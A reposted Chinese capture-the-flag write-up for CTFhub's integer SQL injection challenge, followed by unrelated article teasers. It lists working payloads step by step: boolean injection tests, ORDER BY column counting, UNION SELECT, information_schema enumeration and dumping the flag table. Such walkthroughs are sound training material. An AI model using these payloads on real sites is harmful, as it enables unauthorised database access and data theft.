CTFhub-sql-整数注入

news/2025/4/19 10:29:15/文章来源:https://blog.csdn.net/ssss39/article/details/132381042

判断存在 sqli 注入

1 and 1=1

 1 and 1=2

因为 1=1 为真，1=2 为假，且 1=1 与 1 显示的数据一样，那么就存在 sqli 注入

查询该数据表的字段数量

一、

1,2成功带出数据，3没有数据，所以有两个字段

二、

1 order by 2

1 order by 3

1 order by 2 与 1 显示的一样，1 order by 3 没有数据,所以，字段数为 2

修改参数 ID 值

1 union select 1,2

由于 1 union select 1,2 只返回第一条结果，union select 的结果没有输出，所以需要修改参数 id

值，可以 -1 ,0 随便哪个都可以

 520 union select 1,2

520 union select 1,version()

520 union select 1,database()  #查询当前数据库信息

查询所有的数据库库名（schemata 表储存用户创建的所有数据库的库名，schema_name 数据库库名）

520 union select 1,group_concat(schema_name)

from information_schema.schemata

查询 sqli 数据库下的数据表（tables 表储存用户创建的所有数据库的库名和表名，table_name数据库的表名）

520 union select 1,group_concat(table_name)

from information_schema.tables

where table_schema='sqli'

查询sqli 数据库下，flag 表中的字段名

（columns 表存储用户创建的所有数据库的库名table_schema、表名table_name、字段名column_name）

0 union select 1,group_concat(column_name)

from information_schema.columns

where table_schema='sqli' and table_name='flag'

查询 sqli 数据库中.flag字段名下的字段内容

520 union select 1,group_concat(flag)

from sqli.flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/47068.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

JAMstack架构：快速构建安全、高性能的现代应用

JAMstack架构：快速构建安全、高性能的现代应用

随着Web应用的快速发展，开发者们在寻找更加高效、安全和可维护的应用架构。JAMstack架构应运而生，它通过将前端、后端和部署过程分离，提供了一种现代化的方式来构建Web应用。在本文中，我们将深入探讨JAMstack架构的特点、优势以及…

阅读更多...

【已解决】Please install Node.js and npm before continuing installation.

【已解决】Please install Node.js and npm before continuing installation.

给juopyter lab安装插件时报这个错原因是，conda本身有nodejs，但是版本很低，只有0.几所以需要卸载掉原来的nodejs，重新安装10版本以上的nodejs # 卸载命令 pip uninstall nodejs # 安装命令 conda install nodejs14.7.0 -c cond…

阅读更多...

蓝蓝设计-ui设计公司-界面设计案例作品

蓝蓝设计-ui设计公司-界面设计案例作品

泛亚高科-光伏电站控制系统界面设计 html前端 | 交互设计 | 视觉设计 | 图标设计泛亚高科(北京)科技有限公司（以下简称“泛亚高科”），一个以实时监控、高精度数值计算为基础的科技公司， 自成立以来，组成了以博士、硕…

阅读更多...

分布式搜索引擎----elasticsearch

分布式搜索引擎----elasticsearch

目录 1、初识elasticsearch 1.1、什么是elasticsearch 1.2.ELK技术栈 2、正向索引和倒排索引 2.1、正向索引 2.2、倒排索引 2.3、正向索引和倒排索引的区别 3、elasticsearch中的概念理解 3.1、文档和字段 3.2、索引和映射 3.3、mysql与elasticsearch 1、初识elasti…

阅读更多...

为什么选择elasticsearch分布式搜索引擎

为什么选择elasticsearch分布式搜索引擎

文章目录 🔭什么是elasticsearch🌠ELK技术栈🌠elasticsearch和lucene🌠为什么不是其他搜索技术？ 🔭总结 🔭什么是elasticsearch elasticsearch是一款非常强大的开源搜索引擎，具备非常…

阅读更多...

TCP机制-延迟应答，捎带应答

TCP机制-延迟应答，捎带应答

在看本篇博客前推荐先看TCP中窗口和滑动窗口的含义以及流量控制延迟应答和捎带应答都是TCP用于提高网络传输效率的机制延迟应答当发送端发送数据给接收端了以后，按道理接收端的内核会立即返回ACK（应答报文）给发送端，而且ACK&a…

阅读更多...

SQL有关表的左连接，右连接，以及内连接

SQL有关表的左连接，右连接，以及内连接

首先我们需要想一下，我们为什么需要将表连接在一起呢？换种说法，即我们需要查询的数据不在同一张表里面，而是在A表中查出一部分，然后再去B表中查出一部分，然后两者结合在一起，才是我们需要的部分…

阅读更多...

StringIndexOutOfBoundsException: String index out of range: 458

StringIndexOutOfBoundsException: String index out of range: 458

报错信息： org.springframework.dao.TransientDataAccessResourceException: ### Error updating database. Cause: java.sql.SQLException: java.lang.StringIndexOutOfBoundsException: String index out of range: 458 ... ... ... 问题原因： <i…

阅读更多...

linux-3.4.2 的v4l2驱动框架分析

linux-3.4.2 的v4l2驱动框架分析

一般的驱动框架中，都是分配某个结构体，然后设置注册该结构体，该结构体有个上层管理者，一般是和应用程序交互的入口，V4l2框架框是否也是如此呢，下面进行源码分析。首先uvc_driver.c里分配了uvc_driver结构…

阅读更多...

动漫3D虚拟人物制作为企业数字化转型提供强大动力

动漫3D虚拟人物制作为企业数字化转型提供强大动力

一个 3D 虚拟数字人角色的制作流程，可以分为概念设定-3D 建模-贴图-蒙皮-动画-引擎测试六个步骤，涉及到的岗位有原画师、模型师、动画师等。角色概念设定、贴图绘制一般是由视觉设计师来完成;而建模、装配(骨骼绑定)、渲染动画是由三维设计师来制作完成。…

阅读更多...

R package org.Hs.eg.db to convert gene id

R package org.Hs.eg.db to convert gene id

文章目录 install使用org.Hs.egENSEMBL将Ensembl id convert to gene idorg.Hs.egGENENAME 将Ensembl id convert to gene nameorg.Hs.egSYMBOL 将 gene symbol convert to gene id我现在有一些ensembl id 如何转为 gene name注意你会遇到一些record不全的情况，gtf文…

阅读更多...

Pytorch-day10-模型部署推理-checkpoint

Pytorch-day10-模型部署推理-checkpoint

模型部署&推理模型部署模型推理我们会将PyTorch训练好的模型转换为ONNX 格式，然后使用ONNX Runtime运行它进行推理 1、ONNX ONNX( Open Neural Network Exchange) 是 Facebook (现Meta) 和微软在2017年共同发布的，用于标准描述计算图的一种格式…

阅读更多...

商业智能BI是什么都不明白，如何实现数字化？

商业智能BI是什么都不明白，如何实现数字化？

2021年下半年中国商业智能软件市场规模为4.8亿美元，2021年度市场规模达到7.8亿美元，同比增长34.9%，呈现飞速增长的趋势。数字化时代，商业智能BI对于企业的落地应用有着巨大价值，逐渐成为了现代企业信息化、数字化转型中…

阅读更多...

【Leetcode Sheet】Weekly Practice 3

【Leetcode Sheet】Weekly Practice 3

Leetcode Test 833 字符串中的查找与替换(8.15) 你会得到一个字符串 s (索引从 0 开始)，你必须对它执行 k 个替换操作。替换操作以三个长度均为 k 的并行数组给出：indices, sources, targets。要完成第 i 个替换操作: 检查子字符串 sources[i] 是否…

阅读更多...

怎么借助ChatGPT处理数据结构的问题

怎么借助ChatGPT处理数据结构的问题

目录使用ChatGPT进行数据格式化转换代码示例 ChatGPT格式化数据提示语代码示例批量格式化数据提示语代码示例 ChatGPT生成的格式化批处理代码使用ChatGPT合并不同数据源的数据合并数据提示语自动合并数据提示语 ChatGPT生成的自动合并代码结论数据合并是…

阅读更多...

在Windows下安装PIP+Phantomjs+Selenium

在Windows下安装PIP+Phantomjs+Selenium

最近准备深入学习Python相关的爬虫知识了，如果说在使用Python爬取相对正规的网页使用"urllib2 BeautifulSoup 正则表达式"就能搞定的话；那么动态生成的信息页面，如Ajax、JavaScript等就需要通过"Phantomjs CasperJS Selen…

阅读更多...

【从零开始的rust web开发之路二】axum中间件和共享状态使用

【从零开始的rust web开发之路二】axum中间件和共享状态使用

系列文章目录第一章 axum学习使用第二章 axum中间件使用文章目录系列文章目录前言一、中间件是什么二、中间件使用常用中间件使用中间件使用TraceLayer中间件实现请求日志打印自定义中间件共享状态前言上篇文件讲了路由和参数相应相关的。axum还有个关键的地方是中间件…

阅读更多...

clickhouse-备份恢复

clickhouse-备份恢复

一、简介备份恢复是数据库常用的手段，可能大多数公司很少会对大数据所使用的数据进行备份，这里还是了解下比较好，下面做了一些简单的介绍，详细情况可以通过官网来查看，经过测试发现Disk中增量备份并不好用&#xff0…

阅读更多...

电工-学习电工有哪些好处

电工-学习电工有哪些好处

学习电工有哪些好处？在哪学习电工？ 学习电工有哪些好处？在哪学习电工？学习电工可以做什么？优势有哪些？ 学习电工可以做什么？学习电工有哪些好处？ 就业去向：可在企业单位…

阅读更多...

“深入探索JVM内部机制：理解Java虚拟机的运行原理“

“深入探索JVM内部机制：理解Java虚拟机的运行原理“

标题：深入探索JVM内部机制：理解Java虚拟机的运行原理摘要：本篇博客将深入探索Java虚拟机（JVM）的内部机制，帮助读者理解JVM的运行原理。我们将介绍JVM的组成结构，包括类加载器、运行时数据区域…

阅读更多...

最新文章